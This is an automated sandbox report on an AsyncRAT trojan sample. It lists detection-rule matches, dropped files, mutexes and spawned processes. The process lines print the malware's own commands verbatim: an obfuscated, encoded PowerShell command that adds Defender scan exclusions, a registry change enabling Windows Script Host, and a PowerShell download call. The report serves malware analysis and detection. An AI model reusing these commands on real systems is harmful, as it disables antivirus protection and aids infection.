Source: dump.pcap, type: PCAP Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 16.2.Lxfrfbi.exe.3c7cd6c.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 16.2.Lxfrfbi.exe.3c7cd6c.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 3.2.Vulvvmkewji.exe.36bbf70.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 3.2.Vulvvmkewji.exe.36bbf70.4.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 12.2.Lxfrfbi.exe.33f31b0.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 12.2.Lxfrfbi.exe.33f31b0.4.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 3.2.Vulvvmkewji.exe.3709a7c.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 3.2.Vulvvmkewji.exe.3709a7c.2.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 16.2.Lxfrfbi.exe.3c35eec.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 16.2.Lxfrfbi.exe.3c35eec.5.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 16.2.Lxfrfbi.exe.3c7cd6c.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 16.2.Lxfrfbi.exe.3c7cd6c.3.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 12.2.Lxfrfbi.exe.33ac330.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 12.2.Lxfrfbi.exe.33ac330.0.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 15.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 15.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 3.2.Vulvvmkewji.exe.3709a7c.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 3.2.Vulvvmkewji.exe.3709a7c.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 12.2.Lxfrfbi.exe.33f31b0.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 12.2.Lxfrfbi.exe.33f31b0.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0000000C.00000002.1931713295.00000000033E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 0000000C.00000002.1931713295.00000000033E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0000000F.00000002.2012368541.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0000000A.00000002.2944600925.0000000008E00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000A.00000002.2920632986.00000000068F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000011.00000002.2103131027.0000000005465000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000A.00000002.2944600925.0000000008ED8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000F.00000002.2133699444.0000000009596000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000F.00000002.2027914076.00000000070E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000003.00000002.1722917882.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000003.00000002.1722917882.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000010.00000002.2101694396.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000010.00000002.2101694396.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000011.00000002.2121649452.000000000703C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: Process Memory Space: AppLaunch.exe PID: 7608, type: MEMORYSTR Matched rule: Detects AsyncRAT Author: ditekSHen
Source: Process Memory Space: Lxfrfbi.exe PID: 7936, type: MEMORYSTR Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: Process Memory Space: AppLaunch.exe PID: 8084, type: MEMORYSTR Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: Process Memory Space: AppLaunch.exe PID: 8084, type: MEMORYSTR Matched rule: Detects AsyncRAT Author: ditekSHen
Source: Process Memory Space: Lxfrfbi.exe PID: 8140, type: MEMORYSTR Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: Process Memory Space: AppLaunch.exe PID: 7432, type: MEMORYSTR Matched rule: Detects AsyncRAT Author: ditekSHen
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Vulvvmkewji.exe 0D9C95A567B68AEA53A66B961220A6D5FF14134A91A7EE3B31DEC8A9EC74FAFA
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\Lxfrfbi.exe 0D9C95A567B68AEA53A66B961220A6D5FF14134A91A7EE3B31DEC8A9EC74FAFA
Source: Office Installer.exe.0.dr Static PE information: Number of sections : 17 > 10
Source: Gm602axA2d.exe, 00000000.00000002.1681159516.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename7z.sfx.exe, vs Gm602axA2d.exe
Source: Gm602axA2d.exe, 00000000.00000002.1681159516.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename7z.exe, vs Gm602axA2d.exe
Source: Gm602axA2d.exe, 00000000.00000002.1681159516.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: to be able to be painted.XF-NF6f076MLTSC2024-1203-4fb4OriginalFilenameProject393-9fb6WQ6bf4NT1040QC-KK869GBOffice 2013 kk-kz1041kk-KZGD9GF-K981159YV6-22PColombiaadd "HKCU\Software\Microsoft\Office\16.0\Common" /v "qmenable" /t REG_DWORD /d 0 /fDogfood_Canary1042PRX-QV9JF-G3Caribbean# vs Gm602axA2d.exe
Source: Gm602axA2d.exe, 00000000.00000002.1680581407.0000000004092000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameVulvvmkewji.exe< vs Gm602axA2d.exe
Source: Gm602axA2d.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Process created: C:\Windows\System32\reg.exe "reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings" /v "Enabled" /t REG_DWORD /d 1 /f
Source: dump.pcap, type: PCAP Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 16.2.Lxfrfbi.exe.3c7cd6c.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 16.2.Lxfrfbi.exe.3c7cd6c.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 3.2.Vulvvmkewji.exe.36bbf70.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 3.2.Vulvvmkewji.exe.36bbf70.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 12.2.Lxfrfbi.exe.33f31b0.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 12.2.Lxfrfbi.exe.33f31b0.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 3.2.Vulvvmkewji.exe.3709a7c.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 3.2.Vulvvmkewji.exe.3709a7c.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 16.2.Lxfrfbi.exe.3c35eec.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 16.2.Lxfrfbi.exe.3c35eec.5.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 16.2.Lxfrfbi.exe.3c7cd6c.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 16.2.Lxfrfbi.exe.3c7cd6c.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 12.2.Lxfrfbi.exe.33ac330.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 12.2.Lxfrfbi.exe.33ac330.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 15.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 15.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 3.2.Vulvvmkewji.exe.3709a7c.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 3.2.Vulvvmkewji.exe.3709a7c.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 12.2.Lxfrfbi.exe.33f31b0.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 12.2.Lxfrfbi.exe.33f31b0.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0000000C.00000002.1931713295.00000000033E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 0000000C.00000002.1931713295.00000000033E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0000000F.00000002.2012368541.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0000000A.00000002.2944600925.0000000008E00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000A.00000002.2920632986.00000000068F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000011.00000002.2103131027.0000000005465000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000A.00000002.2944600925.0000000008ED8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000F.00000002.2133699444.0000000009596000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000F.00000002.2027914076.00000000070E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000003.00000002.1722917882.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000003.00000002.1722917882.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000010.00000002.2101694396.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000010.00000002.2101694396.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000011.00000002.2121649452.000000000703C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: AppLaunch.exe PID: 7608, type: MEMORYSTR Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: Lxfrfbi.exe PID: 7936, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: AppLaunch.exe PID: 8084, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: AppLaunch.exe PID: 8084, type: MEMORYSTR Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: Lxfrfbi.exe PID: 8140, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: AppLaunch.exe PID: 7432, type: MEMORYSTR Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: classification engine Classification label: mal100.troj.evad.winEXE@23/17@0/1
Source: C:\Users\user\Desktop\Gm602axA2d.exe File created: C:\Users\user\AppData\Local\Vulvvmkewji.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7176:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7548:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Mutant created: \Sessions\1\BaseNamedObjects\Llg9a02PERRO
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7408:120:WilError_03
Source: C:\Users\user\Desktop\Gm602axA2d.exe File created: C:\Users\user\AppData\Local\Temp\Office Installer.exe
Source: Gm602axA2d.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Gm602axA2d.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Gm602axA2d.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Gm602axA2d.exe ReversingLabs: Detection: 76%
Source: Gm602axA2d.exe Virustotal: Detection: 60%
Source: C:\Users\user\Desktop\Gm602axA2d.exe Evasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown Process created: C:\Users\user\Desktop\Gm602axA2d.exe "C:\Users\user\Desktop\Gm602axA2d.exe"
Source: C:\Users\user\Desktop\Gm602axA2d.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAdgB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAdABkACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAcwBqACMAPgA="
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Gm602axA2d.exe Process created: C:\Users\user\AppData\Local\Vulvvmkewji.exe "C:\Users\user\AppData\Local\Vulvvmkewji.exe"
Source: C:\Users\user\Desktop\Gm602axA2d.exe Process created: C:\Users\user\AppData\Local\Temp\Office Installer.exe "C:\Users\user\AppData\Local\Temp\Office Installer.exe"
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Process created: C:\Windows\System32\reg.exe "reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings" /v "Enabled" /t REG_DWORD /d 1 /f
Source: C:\Windows\System32\reg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -nop -command "& { (New-Object Net.WebClient).DownloadFile('https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api/v2/C2RReleaseData', 'C:\Users\user\AppData\Local\Temp\files\ver.txt') }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\Lxfrfbi.exe "C:\Users\user\AppData\Roaming\Lxfrfbi.exe"
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\Lxfrfbi.exe "C:\Users\user\AppData\Roaming\Lxfrfbi.exe"
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
Source: C:\Users\user\Desktop\Gm602axA2d.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Gm602axA2d.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Gm602axA2d.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Gm602axA2d.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Gm602axA2d.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Gm602axA2d.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Gm602axA2d.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Gm602axA2d.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\Gm602axA2d.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Gm602axA2d.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Gm602axA2d.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Gm602axA2d.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Gm602axA2d.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\Gm602axA2d.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Gm602axA2d.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Gm602axA2d.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\Gm602axA2d.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\Gm602axA2d.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\Gm602axA2d.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Gm602axA2d.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\Gm602axA2d.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\Gm602axA2d.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
